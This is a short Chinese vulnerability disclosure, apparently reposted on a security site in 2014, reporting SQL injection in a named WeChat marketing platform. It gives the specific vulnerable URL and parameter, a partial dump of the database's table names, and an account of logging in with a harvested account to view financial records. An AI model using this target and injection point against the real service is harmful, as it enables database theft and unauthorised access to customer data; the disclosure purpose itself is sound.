某微信营销系统存在sql注入漏洞所有底细一览无余下载

来源:黑吧安全网 浏览:1128次 时间:2014-04-28
做网站找雨过天晴工作室

sql注入漏洞,嗯,因为这个微信营销系统最重要的数据库已经可被拖库,所以自评个高rank

访问链接 http://www.wechatpen.com/api/app/website/list.aspx?wid=332389&acid=10379&menu_id=145128,正常



访问链接

http://www.wechatpen.com/api/app/website/detail.aspx?sn=&wid=332389&acid=%22&menu_id=145128&wxref=mp.weixin.qq.com,有惊喜



爆库:

 

Database: weixinbao
[233 tables]
+---------------------------------------+
| module |
| account |
| account_copy20131120 |
| account_copy20140126 |
| accountdetail |
| admin_nums |
| agent_level |
| www.myhack58.com | | app_advs |
| app_attributes |
| app_attributevalues |
| app_brand |
| app_coupon |
| app_coupon_avis |
| app_coupon_result |
| app_coupon_sn |
| app_crm_datereport |
| app_crm_user |
| app_crm_usertarget |
| app_crm_weixin_account |
| app_custom |
| app_eventclick_config |
| app_eventclick_menu_config |
| app_fodder |
| app_food_choicefoodinfo |
| app_food_choicefoodlist |
| app_food_dinnertable |
| app_food_foodgroup |
| app_food_foodset |
。。。
有200多个呢,不一一贴了


拿其中一个账号登陆下看看。

 

同样也有财务,报表等数据,也可越权登陆功能。
拿其中一个账号登陆下看看。


 

同样也有财务,报表等数据,也可越权登陆功能。

怎样堵住漏洞你们应该比我更懂!